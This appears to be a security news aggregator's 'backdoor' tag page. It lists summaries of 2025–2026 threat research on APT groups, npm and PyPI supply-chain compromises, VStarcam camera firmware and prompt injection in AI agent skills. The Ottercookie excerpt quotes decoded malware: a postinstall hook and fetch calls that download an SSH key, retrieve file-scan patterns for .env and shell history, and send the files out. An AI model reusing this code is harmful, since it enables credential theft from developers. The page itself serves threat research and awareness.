Topics: [Malware](<https://devfeed.tech/topics/malware.md>), [backdoor](<https://devfeed.tech/topics/backdoor.md>), [Reconnaissance](<https://devfeed.tech/topics/recon.md>), [Discord](<https://devfeed.tech/topics/discord.md>), [GitHub](<https://devfeed.tech/topics/github.md>), [API](<https://devfeed.tech/topics/api.md>), [Microsoft](<https://devfeed.tech/topics/microsoft.md>), [Bash](<https://devfeed.tech/topics/bash.md>), [Virtual Private Network](<https://devfeed.tech/topics/vpn.md>), [Amazon S3](<https://devfeed.tech/topics/amazon-s3.md>)

Tags: [api](<https://devfeed.tech/tags/api.md>), [apt](<https://devfeed.tech/tags/apt.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [bash](<https://devfeed.tech/tags/bash.md>), [china](<https://devfeed.tech/tags/china.md>), [discord](<https://devfeed.tech/tags/discord.md>), [eset-research](<https://devfeed.tech/tags/eset-research.md>), [europe](<https://devfeed.tech/tags/europe.md>), [github](<https://devfeed.tech/tags/github.md>), [ip](<https://devfeed.tech/tags/ip.md>), [malware](<https://devfeed.tech/tags/malware.md>), [microsoft](<https://devfeed.tech/tags/microsoft.md>), [s3](<https://devfeed.tech/tags/s3.md>), [server](<https://devfeed.tech/tags/server.md>), [techniques](<https://devfeed.tech/tags/techniques.md>), [tools](<https://devfeed.tech/tags/tools.md>)

### AI overview

ESET researchers analyze Webworm's 2025 activity, including its shift toward Europe, new Discord- and Microsoft Graph API-based backdoors, proxy tools, reconnaissance activity, and GitHub-hosted malware staging.

### Source excerpt

ESET researchers describe new tools and techniques that the Webworm APT group recently added to its arsenal

## Backdoored node-ipc npm releases steal developer credentials through DNS queries

DevFeed: [Backdoored node-ipc npm releases steal developer credentials through DNS queries](<https://devfeed.tech/articles/backdoored-node-ipc-npm-releases-steal-developer-credentials-through-dns-queries-8294.md>)

Original publisher: [Read original article](<https://securitylabs.datadoghq.com/articles/node-ipc-npm-malware-analysis/>)

Author: Nick Frichette

Published: 2026-05-14T00:00:00Z

Content type: article

Language: en

Sources: [Datadog Security Labs](<https://devfeed.tech/sources/datadog-security-labs.md>)

Topics: [Malware](<https://devfeed.tech/topics/malware.md>), [npm](<https://devfeed.tech/topics/npm.md>), [backdoor](<https://devfeed.tech/topics/backdoor.md>), [payload](<https://devfeed.tech/topics/payload.md>), [Amazon Route 53](<https://devfeed.tech/topics/amazon-route-53.md>), [Code](<https://devfeed.tech/topics/code.md>), [Cloud](<https://devfeed.tech/topics/cloud.md>), [Kubernetes](<https://devfeed.tech/topics/kubernetes.md>), [Databases](<https://devfeed.tech/topics/databases.md>), [OpenSSH](<https://devfeed.tech/topics/openssh.md>)

Tags: [analysis](<https://devfeed.tech/tags/analysis.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [cloud](<https://devfeed.tech/tags/cloud.md>), [code](<https://devfeed.tech/tags/code.md>), [database](<https://devfeed.tech/tags/database.md>), [developer](<https://devfeed.tech/tags/developer.md>), [dns](<https://devfeed.tech/tags/dns.md>), [fork](<https://devfeed.tech/tags/fork.md>), [kubernetes](<https://devfeed.tech/tags/kubernetes.md>), [malware](<https://devfeed.tech/tags/malware.md>), [npm](<https://devfeed.tech/tags/npm.md>), [payload](<https://devfeed.tech/tags/payload.md>), [process](<https://devfeed.tech/tags/process.md>), [ssh](<https://devfeed.tech/tags/ssh.md>)

### AI overview

This article analyzes three backdoored node-ipc releases published to npm on May 14, 2026. The malicious CommonJS entrypoint launches a detached process, collects environment, host, developer, cloud, package manager, source control, Kubernetes, database, and SSH credentials, archives the data, and attempts DNS TXT exfiltration.

### Source excerpt

An analysis of backdoored node-ipc npm releases that add an obfuscated credential collection and DNS exfiltration payload to the CommonJS entrypoint.

## Malicious Release of elementary-data PyPI Package Steals Cloud Credentials from Data Engineers

DevFeed: [Malicious Release of elementary-data PyPI Package Steals Cloud Credentials from Data Engineers](<https://devfeed.tech/articles/malicious-release-of-elementary-data-pypi-package-steals-cloud-credentials-from-data-engineers-8011.md>)

Original publisher: [Read original article](<https://snyk.io/blog/malicious-release-of-elementary-data-pypi-package-steals-cloud-credentials-from-data-engineers/>)

Author: Liran Tal

Published: 2026-04-27T23:00:00Z

Content type: news

Language: en

Sources: [Blog RSS Feed | Snyk](<https://devfeed.tech/sources/blog-rss-feed-snyk.md>)

Topics: [data observability](<https://devfeed.tech/topics/data-observability.md>), [GitHub Actions](<https://devfeed.tech/topics/github-actions.md>), [Security](<https://devfeed.tech/topics/security.md>), [supply-chain-security](<https://devfeed.tech/topics/supply-chain-security.md>), [vulnerability](<https://devfeed.tech/topics/vulnerability.md>), [backdoor](<https://devfeed.tech/topics/backdoor.md>), [Python](<https://devfeed.tech/topics/python.md>), [data-engineering](<https://devfeed.tech/topics/data-engineering.md>), [Cloud](<https://devfeed.tech/topics/cloud.md>), [ssh](<https://devfeed.tech/topics/ssh.md>)

Tags: [awareness](<https://devfeed.tech/tags/awareness.md>), [aws](<https://devfeed.tech/tags/aws.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [blog](<https://devfeed.tech/tags/blog.md>), [data-engineering](<https://devfeed.tech/tags/data-engineering.md>), [developer](<https://devfeed.tech/tags/developer.md>), [devops](<https://devfeed.tech/tags/devops.md>), [devrel](<https://devfeed.tech/tags/devrel.md>), [docker](<https://devfeed.tech/tags/docker.md>), [github-actions](<https://devfeed.tech/tags/github-actions.md>), [kubernetes](<https://devfeed.tech/tags/kubernetes.md>), [python](<https://devfeed.tech/tags/python.md>), [security](<https://devfeed.tech/tags/security.md>), [snyk-platform](<https://devfeed.tech/tags/snyk-platform.md>), [ssh](<https://devfeed.tech/tags/ssh.md>), [supply-chain](<https://devfeed.tech/tags/supply-chain.md>), [supply-chain-security](<https://devfeed.tech/tags/supply-chain-security.md>), [vulnerability](<https://devfeed.tech/tags/vulnerability.md>)

### AI overview

Attackers compromised the elementary-data Python package's GitHub Actions publication pipeline through script injection and released malicious content that stole cloud credentials and SSH secrets from data engineering environments.

### Source excerpt

Attackers exploited a GitHub Actions script injection vulnerability to publish a malicious version of the elementary-data Python CLI (v0.23.3), embedding a credential-stealing backdoor that targeted dbt profiles, cloud provider keys, and SSH secrets from data engineering environments.

## GopherWhisper: A burrow full of malware

DevFeed: [GopherWhisper: A burrow full of malware](<https://devfeed.tech/articles/gopherwhisper-a-burrow-full-of-malware-8372.md>)

Original publisher: [Read original article](<https://www.welivesecurity.com/en/eset-research/gopherwhisper-burrow-full-malware/>)

Author: Eric Howard

Published: 2026-04-23T08:59:18Z

Content type: article

Language: en

Sources: [WeLiveSecurity](<https://devfeed.tech/sources/welivesecurity.md>)

Topics: [backdoor](<https://devfeed.tech/topics/backdoor.md>), [Go Language](<https://devfeed.tech/topics/go-language.md>), [C++](<https://devfeed.tech/topics/c-plus-plus.md>)

Tags: [api](<https://devfeed.tech/tags/api.md>), [apt](<https://devfeed.tech/tags/apt.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [c-plus-plus](<https://devfeed.tech/tags/c-plus-plus.md>), [china](<https://devfeed.tech/tags/china.md>), [discord](<https://devfeed.tech/tags/discord.md>), [eset-research](<https://devfeed.tech/tags/eset-research.md>), [go](<https://devfeed.tech/tags/go.md>), [malware](<https://devfeed.tech/tags/malware.md>), [microsoft-365](<https://devfeed.tech/tags/microsoft-365.md>), [slack](<https://devfeed.tech/tags/slack.md>)

### AI overview

ESET Research describes GopherWhisper, a China-aligned APT group targeting a Mongolian government entity. Its largely Go-based malware toolset uses backdoors, injectors, loaders, and legitimate services including Discord, Slack, Microsoft 365 Outlook, and file.io for command-and-control and exfiltration.

### Source excerpt

ESET Research has discovered a new China-aligned APT group that we've named GopherWhisper, which targets Mongolian governmental institutions

## Mapping Ottercookie Infrastructure

DevFeed: [Mapping Ottercookie Infrastructure](<https://devfeed.tech/articles/mapping-ottercookie-infrastructure-22542.md>)

Original publisher: [Read original article](<https://medium.com/walmartglobaltech/mapping-ottercookie-infrastructure-1c49f0cd3883?source=rss----905ea2b3d4d1---4>)

Author: Jason Reaves

Published: 2026-04-06T17:33:39Z

Content type: article

Language: en

Sources: [Walmart Global Tech](<https://devfeed.tech/sources/walmart-global-tech.md>)

Topics: [Threat Research](<https://devfeed.tech/topics/threat-research.md>), [Malware](<https://devfeed.tech/topics/malware.md>), [JavaScript](<https://devfeed.tech/topics/javascript.md>), [npm](<https://devfeed.tech/topics/npm.md>), [ssh](<https://devfeed.tech/topics/ssh.md>), [Feathers](<https://devfeed.tech/topics/feathers.md>)

Tags: [backdoor](<https://devfeed.tech/tags/backdoor.md>), [credentials](<https://devfeed.tech/tags/credentials.md>), [infosec](<https://devfeed.tech/tags/infosec.md>), [javascript](<https://devfeed.tech/tags/javascript.md>), [malware](<https://devfeed.tech/tags/malware.md>), [malware-analysis](<https://devfeed.tech/tags/malware-analysis.md>), [npm](<https://devfeed.tech/tags/npm.md>), [reverse-engineering](<https://devfeed.tech/tags/reverse-engineering.md>), [ssh](<https://devfeed.tech/tags/ssh.md>)

### AI overview

Jason Reaves analyzes infrastructure associated with OtterCookie and related DPRK-linked malware activity. The article examines a NodeJS package whose decoded code downloads an SSH key, retrieves scan patterns targeting files such as .env and shell history, and sends collected files to remote infrastructure. It then uses port mappings and banner hashes to map additional infrastructure.

### Source excerpt

By: Jason Reaves A lot of focus specifically surrounding DPRK has been on IT workers but there are multiple entities performing various schemes. One of the more prolific ones being interviewing developers and having them work on TA supplied code repositories from various sites. The malware delivered is normally leveraged for harvesting credentials and crypto; InvisibleFerret[5], BeaverTail, OtterCookie and Golang based malware[4]. Alot of work goes into tracking and cataloging the various malware families and their code overlaps, not many people focus on the infrastructure side though which is surprising because it's pretty similar to malware analysis; just more pattern matching. While tracking some other malware I ended up pivoting into NodeJS based stealer and backdoor code that resembled similar tactics to DPRK campaigns. 3a08e7f236aac7f6eb6f75911b98bc5157dcfa53b268b447f7d1b87b0615b90d "name": "npm-doc-builder", "version": "1.0.5", "description": "", "main": "index.js", "scripts": { "postinstall": "node test.js" }, "publishConfig": { "access": "public" }, "dependencies": { "axios": "^1.7.0", "child_process": "^1.0.2", "os": "^0.1.2" }, "engines": { "node": ">=18" }, "keywords": [], "author": "", "license": "ISC", "type": "commonjs" The decoded index javascript from this package ends up doing a few things, first it will want to download a SSH key to be added locally: const _0x30c718 = await fetch("https://cloudflareinsights[.]vercel[.]app/"); const { msg: _0x50cbce } = await _0x30c718.json(); let _0x581499 = false; if (process.platform === "linux") { _0x581499 = addSshKeyToUser(_0x50cbce); It will also download patterns for scanning const _0x3c4caa = await fetch("https://cloudflareinsights[.]vercel[.]app/api/scan-patterns"); const { scanPatterns: _0x28ca54 } = await _0x3c4caa.json(); In this case it returned: {"scanPatterns":[".env",".bash_history","ConsoleHost_history.txt"]} Ultimately wanting to send off the files: for (let _0x14ded9 = 0x0; _0x14ded9 < _0x57def7

## Compromised axios npm package delivers cross-platform RAT

DevFeed: [Compromised axios npm package delivers cross-platform RAT](<https://devfeed.tech/articles/compromised-axios-npm-package-delivers-cross-platform-rat-8274.md>)

Original publisher: [Read original article](<https://securitylabs.datadoghq.com/articles/axios-npm-supply-chain-compromise/>)

Author: Christophe Tafani-Dereeper

Published: 2026-03-31T00:00:00Z

Content type: article

Language: en

Sources: [Datadog Security Labs](<https://devfeed.tech/sources/datadog-security-labs.md>)

Topics: [npm packages](<https://devfeed.tech/topics/npm-packages.md>), [Remote Access Trojan](<https://devfeed.tech/topics/remote-access-trojan.md>), [backdoor](<https://devfeed.tech/topics/backdoor.md>), [account takeover](<https://devfeed.tech/topics/account-takeover.md>), [payload](<https://devfeed.tech/topics/payload.md>), [npm](<https://devfeed.tech/topics/npm.md>), [OpenID connect (OIDC)](<https://devfeed.tech/topics/oidc.md>), [GitHub Actions](<https://devfeed.tech/topics/github-actions.md>), [Linux](<https://devfeed.tech/topics/linux.md>), [Windows](<https://devfeed.tech/topics/windows.md>)

Tags: [account-takeover](<https://devfeed.tech/tags/account-takeover.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [ci-cd](<https://devfeed.tech/tags/ci-cd.md>), [github-actions](<https://devfeed.tech/tags/github-actions.md>), [linux](<https://devfeed.tech/tags/linux.md>), [npm-packages](<https://devfeed.tech/tags/npm-packages.md>), [oidc](<https://devfeed.tech/tags/oidc.md>), [payload](<https://devfeed.tech/tags/payload.md>), [remote-access-trojan](<https://devfeed.tech/tags/remote-access-trojan.md>), [supply-chain](<https://devfeed.tech/tags/supply-chain.md>), [windows](<https://devfeed.tech/tags/windows.md>)

### AI overview

The article analyzes a March 31, 2026 supply-chain compromise in which an attacker hijacked an axios npm maintainer account and published two malicious releases. The releases added a typosquatted dependency that installed a cross-platform remote access trojan, though bugs limited the Windows and Linux payloads. The compromise lasted about three hours before npm removed the packages.

### Source excerpt

An attacker hijacked an axios maintainer's npm account to publish malicious releases that deliver a cross-platform RAT.

## Sednit reloaded: Back in the trenches

DevFeed: [Sednit reloaded: Back in the trenches](<https://devfeed.tech/articles/sednit-reloaded-back-in-the-trenches-8382.md>)

Original publisher: [Read original article](<https://www.welivesecurity.com/en/eset-research/sednit-reloaded-back-trenches/>)

Author: ESET Research

Published: 2026-03-10T09:58:00Z

Content type: article

Language: en

Sources: [WeLiveSecurity](<https://devfeed.tech/sources/welivesecurity.md>)

Topics: [apt](<https://devfeed.tech/topics/apt.md>), [Cloud](<https://devfeed.tech/topics/cloud.md>), [obfuscation](<https://devfeed.tech/topics/obfuscation.md>), [PowerShell](<https://devfeed.tech/topics/powershell.md>), [Code](<https://devfeed.tech/topics/code.md>), [Network](<https://devfeed.tech/topics/network.md>), [Open Source](<https://devfeed.tech/topics/open-source.md>)

Tags: [apt](<https://devfeed.tech/tags/apt.md>), [attacks](<https://devfeed.tech/tags/attacks.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [cloud](<https://devfeed.tech/tags/cloud.md>), [code](<https://devfeed.tech/tags/code.md>), [department-of-justice](<https://devfeed.tech/tags/department-of-justice.md>), [eset-research](<https://devfeed.tech/tags/eset-research.md>), [network](<https://devfeed.tech/tags/network.md>), [obfuscation](<https://devfeed.tech/tags/obfuscation.md>), [open-source](<https://devfeed.tech/tags/open-source.md>), [powershell](<https://devfeed.tech/tags/powershell.md>), [us](<https://devfeed.tech/tags/us.md>)

### AI overview

This article examines the resurgence of Sednit, also known as APT28, and its modern espionage toolkit. It describes the BeardShell and Covenant implants, their use of legitimate cloud providers for command and control and resilience, PowerShell execution, obfuscation, and links to Sednit's earlier tools and operations.

### Source excerpt

The resurgence of one of Russia's most notorious APT groups

## Snyk Finds Prompt Injection in 36%, 1467 Malicious Payloads in a ToxicSkills Study of Agent Skills Supply Chain Compromise

DevFeed: [Snyk Finds Prompt Injection in 36%, 1467 Malicious Payloads in a ToxicSkills Study of Agent Skills Supply Chain Compromise](<https://devfeed.tech/articles/snyk-finds-prompt-injection-in-36-1467-malicious-payloads-in-a-toxicskills-study-of-agent-skills-supply-chain-compromise-8218.md>)

Original publisher: [Read original article](<https://snyk.io/blog/toxicskills-malicious-ai-agent-skills-clawhub/>)

Author: Luca Beurer-Kellner; Aleksei Kudrinskii; Marco Milanta; Kristian Bonde Nielsen; Hemang Sarkar; Liran Tal

Published: 2026-02-05T05:00:00Z

Content type: article

Language: en

Sources: [Blog RSS Feed | Snyk](<https://devfeed.tech/sources/blog-rss-feed-snyk.md>)

Topics: [Agent Skills](<https://devfeed.tech/topics/agent-skills.md>), [Security](<https://devfeed.tech/topics/security.md>), [supply-chain-security](<https://devfeed.tech/topics/supply-chain-security.md>), [prompt injection](<https://devfeed.tech/topics/prompt-injection.md>), [AI Agent](<https://devfeed.tech/topics/ai-agent.md>), [Credential theft](<https://devfeed.tech/topics/credential-theft.md>), [Malware](<https://devfeed.tech/topics/malware.md>), [Claude Code](<https://devfeed.tech/topics/claude-code.md>), [cursor](<https://devfeed.tech/topics/cursor.md>), [OpenClaw](<https://devfeed.tech/topics/openclaw.md>), [API keys](<https://devfeed.tech/topics/api-keys.md>), [backdoor](<https://devfeed.tech/topics/backdoor.md>)

Tags: [agent](<https://devfeed.tech/tags/agent.md>), [agent-skills](<https://devfeed.tech/tags/agent-skills.md>), [ai](<https://devfeed.tech/tags/ai.md>), [api-keys](<https://devfeed.tech/tags/api-keys.md>), [awareness](<https://devfeed.tech/tags/awareness.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [blog](<https://devfeed.tech/tags/blog.md>), [credential-theft](<https://devfeed.tech/tags/credential-theft.md>), [developer](<https://devfeed.tech/tags/developer.md>), [malware](<https://devfeed.tech/tags/malware.md>), [prompt-injection](<https://devfeed.tech/tags/prompt-injection.md>), [security](<https://devfeed.tech/tags/security.md>), [supply-chain](<https://devfeed.tech/tags/supply-chain.md>), [supply-chain-security](<https://devfeed.tech/tags/supply-chain-security.md>), [vulnerability-insights](<https://devfeed.tech/tags/vulnerability-insights.md>)

### AI overview

Snyk's ToxicSkills audit examined 3,984 AI agent skills and found that 36.82% had at least one security flaw. The research identified malware, credential theft, prompt injection, exposed secrets, backdoors, and data exfiltration affecting users of OpenClaw, Claude Code, and Cursor.

### Source excerpt

Snyk's ToxicSkills research reveals 36% of AI agent skills contain security flaws, including 1,467 vulnerable skills and active malicious payloads targeting OpenClaw, Claude Code, and Cursor users.

## Backdoors in VStarcam cameras

DevFeed: [Backdoors in VStarcam cameras](<https://devfeed.tech/articles/backdoors-in-vstarcam-cameras-36630.md>)

Original publisher: [Read original article](<https://palant.info/2026/01/07/backdoors-in-vstarcam-cameras/>)

Author: Wladimir Palant

Published: 2026-01-07T13:01:48Z

Content type: article

Language: en

Sources: [Almost Secure](<https://devfeed.tech/sources/almost-secure.md>)

Topics: [Security](<https://devfeed.tech/topics/security.md>), [backdoor](<https://devfeed.tech/topics/backdoor.md>), [passwords](<https://devfeed.tech/topics/passwords.md>), [P2P](<https://devfeed.tech/topics/p2p.md>), [Protocol (disambiguation)](<https://devfeed.tech/topics/protocol.md>)

Tags: [backdoor](<https://devfeed.tech/tags/backdoor.md>), [cameras](<https://devfeed.tech/tags/cameras.md>), [p2p](<https://devfeed.tech/tags/p2p.md>), [passwords](<https://devfeed.tech/tags/passwords.md>), [protocol](<https://devfeed.tech/tags/protocol.md>), [security](<https://devfeed.tech/tags/security.md>)

### AI overview

An investigation of VStarcam cameras finds that firmware mechanisms systematically undermine administrator-password protection by leaking passwords and exposing cameras through internet-connected P2P functionality. The article also examines insecure firmware updates delivered over plain HTTP and recommends restricting internet access with a network firewall or using custom firmware.

### Source excerpt

VStarcam is an important brand of cameras based on the PPPP protocol. Unlike the LookCam cameras I looked into earlier, these are often being positioned as security cameras. And they in fact do a few things better like... well, like having a mostly working authentication mechanism. In order to access the camera one has to know its administrator password. So much for the theory. When I looked into the firmware of the cameras I discovered a surprising development: over the past years this protection has been systematically undermined. Various mechanisms have been added that leak the access password, and in several cases these cannot be explained as accidents. The overall tendency is clear: for some reason VStarcam really wants to have access to their customer's passwords. A reminder: "P2P" functionality based on the PPPP protocol means that these cameras will always communicate with and be accessible from the internet, even when located on a home network behind NAT. Short of installing a custom firmware this can only addressed by configuring the network firewall to deny internet access. Contents How to recognize affected cameras Downloading the firmware Caveats of this survey VStarcam's authentication approach Endpoint protection Unauthenticated log access Explicit password leaking via logs Log uploading Password-leaking backdoor Establishing a timeline The impact Coordinated disclosure attempt Recommendations How to recognize affected cameras Not every VStarcam camera has "VStarcam" printed on the side. I have seen reports of VStarcam cameras being sold under the brand names Besder, MVPower, AOMG, OUSKI, and there are probably more. Most cameras should be recognizable by the app used to manage them. Any camera managed by one of these apps should be a VStarcam camera: Eye4, EyeCloud, FEC Smart Home, HOTKam, O-KAM Pro, PnPCam, VeePai, VeeRecon, Veesky, VKAM, VsCam, VStarcam Ultra. Downloading the firmware VStarcam cameras have a mechanism to deliver firmware updates (Loo

## LongNosedGoblin tries to sniff out governmental affairs in Southeast Asia and Japan

DevFeed: [LongNosedGoblin tries to sniff out governmental affairs in Southeast Asia and Japan](<https://devfeed.tech/articles/longnosedgoblin-tries-to-sniff-out-governmental-affairs-in-southeast-asia-and-japan-8374.md>)

Original publisher: [Read original article](<https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/>)

Author: Anton Cherepanov Peter Strýček

Published: 2025-12-18T10:00:00Z

Content type: article

Language: en

Sources: [WeLiveSecurity](<https://devfeed.tech/sources/welivesecurity.md>)

Topics: [backdoor](<https://devfeed.tech/topics/backdoor.md>), [.NET](<https://devfeed.tech/topics/net.md>), [enterprise deployment](<https://devfeed.tech/topics/enterprise-deployment.md>)

Tags: [apt](<https://devfeed.tech/tags/apt.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [browser](<https://devfeed.tech/tags/browser.md>), [c-sharp](<https://devfeed.tech/tags/c-sharp.md>), [china](<https://devfeed.tech/tags/china.md>), [cloud](<https://devfeed.tech/tags/cloud.md>), [cloud-services](<https://devfeed.tech/tags/cloud-services.md>), [eset-research](<https://devfeed.tech/tags/eset-research.md>), [google](<https://devfeed.tech/tags/google.md>), [japan](<https://devfeed.tech/tags/japan.md>), [malware](<https://devfeed.tech/tags/malware.md>), [microsoft](<https://devfeed.tech/tags/microsoft.md>), [net](<https://devfeed.tech/tags/net.md>), [policy](<https://devfeed.tech/tags/policy.md>), [techniques](<https://devfeed.tech/tags/techniques.md>), [windows](<https://devfeed.tech/tags/windows.md>)

### AI overview

ESET describes LongNosedGoblin, a China-aligned APT group conducting cyberespionage against governmental entities in Southeast Asia and Japan. The group deploys malware through Group Policy and uses tools including the NosyDoor backdoor and the C#/.NET NosyHistorian application.

### Source excerpt

ESET researchers discovered a China-aligned APT group, LongNosedGoblin, which uses Group Policy to deploy cyberespionage tools across networks of governmental institutions

[Next page](<https://devfeed.tech/tags/backdoor.md?cursor=WyIyMDI1LTEyLTE4VDEwOjAwOjAwKzAwOjAwIiwgIjhlOGQ1M2QxLTQ1ZmEtNDc3MC1hYTE1LTljMTE0Yzg1ZWYzMiJd>)